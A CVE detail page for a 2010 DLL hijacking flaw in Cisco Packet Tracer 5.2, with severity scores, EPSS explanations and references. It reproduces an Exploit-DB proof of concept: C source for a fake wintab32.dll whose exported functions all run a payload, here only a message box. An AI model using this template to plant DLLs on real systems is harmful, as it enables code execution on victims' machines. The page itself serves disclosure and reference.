CVE-2010-3135 : Detail

CVE-2010-3135

1.48%V3
Network
2010-08-26
16h00 +00:00
2017-08-16
12h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Untrusted search path vulnerability in Cisco Packet Tracer 5.2 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse wintab32.dll that is located in the same folder as a .pkt or .pkz file.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 14774

Publication date : 2010-08-24 22h00 +00:00
Author : CCNA
EDB Verified : No

/* Title: Cisco Packet Tracer 5.2 DLL Hijacking Exploit (wintab32.dll) Date:05/08/2010 Author: CCNA Tested on: Windows XP SP 2 Extension: .pkt .pkz Greets: xokaido, hex, hektor, classical */ #include <windows.h> #define DllExport __declspec (dllexport) DllExport void WTInfoA() { theCode(); } DllExport void WTOpenA() { theCode(); } DllExport void WTClose() { theCode(); } DllExport void WTPacketsGet() { theCode(); } DllExport void WTPacket() { theCode(); } DllExport void GetFunctionKeysEx() { theCode(); } DllExport void RemoveTaskBarIcon() { theCode(); } DllExport void RunTaskBarIcon() { theCode(); } DllExport void SetFunctionKeysEx() { theCode(); } DllExport void TGL_Attach() { theCode(); } DllExport void TGL_Close() { theCode(); } DllExport void TGL_Detach() { theCode(); } DllExport void TGL_EndLine() { theCode(); } DllExport void TGL_Get() { theCode(); } DllExport void TGL_LineTo() { theCode(); } DllExport void TGL_MoveTo() { theCode(); } DllExport void TGL_Open() { theCode(); } DllExport void TGL_Set() { theCode(); } DllExport void WTOnEvent() { theCode(); } DllExport void WTEnable() { theCode(); } DllExport void WTOverlap() { theCode(); } DllExport void WTServiceStart() { theCode(); } DllExport void WTServiceStop() { theCode(); } DllExport void WTSetDevice() { theCode(); } DllExport void CloseTabletDevice() { theCode(); } DllExport void CreateTaskBarIcon() { theCode(); } DllExport void OpenTabletDevice() { theCode(); } DllExport void RegDeleteFKeys() { theCode(); } DllExport void RegGetFKeys() { theCode(); } DllExport void RunClientSideService() { theCode(); } DllExport void SetFunctionKeys() { theCode(); } DllExport void TDCalibration() { theCode(); } DllExport void TDGetHwInfoEx() { theCode(); } DllExport void TDGetHwInfoExV2() { theCode(); } DllExport void TDGetInfoEx() { theCode(); } DllExport void TDGetProtectData() { theCode(); } DllExport void TDSetInfoEx() { theCode(); } DllExport void UpdateTaskBar() { theCode(); } DllExport void WTConfig() { theCode(); } DllExport void WTGetA() { theCode(); } DllExport void WTSetA() { theCode(); } DllExport void WTExtGet() { theCode(); } DllExport void WTExtSet() { theCode(); } DllExport void WTSave() { theCode(); } DllExport void WTRestore() { theCode(); } DllExport void WTGetActiveSessionID() { theCode(); } DllExport void WTSetActiveSessionID() { theCode(); } DllExport void WTPacketsPeek() { theCode(); } DllExport void WTDataGet() { theCode(); } DllExport void WTDataPeek() { theCode(); } DllExport void WTQueueSizeGet() { theCode(); } DllExport void WTQueueSizeSet() { theCode(); } DllExport void WTMgrOpen() { theCode(); } DllExport void WTMgrClose() { theCode(); } DllExport void WTMgrContextEnum() { theCode(); } DllExport void WTMgrContextOwner() { theCode(); } DllExport void WTMgrDefContext() { theCode(); } DllExport void WTMgrDeviceConfig() { theCode(); } DllExport void WTMgrExt() { theCode(); } DllExport void WTMgrCsrEnable() { theCode(); } DllExport void WTMgrCsrButtonMap() { theCode(); } DllExport void WTMgrCsrPressureBtnMarks() { theCode(); } DllExport void WTMgrCsrPressureResponse() { theCode(); } DllExport void WTMgrCsrExt() { theCode(); } DllExport void WTQueuePacketsEx() { theCode(); } DllExport void WTMgrCsrPressureBtnMarksEx() { theCode(); } DllExport void WTMgrConfigReplaceExA() { theCode(); } DllExport void WTMgrPacketHookExA() { theCode(); } DllExport void WTMgrPacketUnhook() { theCode(); } DllExport void WTMgrPacketHookNext() { theCode(); } DllExport void WTInfoW() { theCode(); } DllExport void WTOpenW() { theCode(); } DllExport void WTGetW() { theCode(); } DllExport void WTSetW() { theCode(); } DllExport void DllEntryPoint() { theCode(); } int theCode() { MessageBox(0, "You got it !", "DLL Message", MB_OK); return 0; }

Products Mentioned

Configuraton 0

Cisco>>Packet_tracer >> Version 5.2

References

http://www.exploit-db.com/exploits/14774
Tags : exploit, x_refsource_EXPLOIT-DB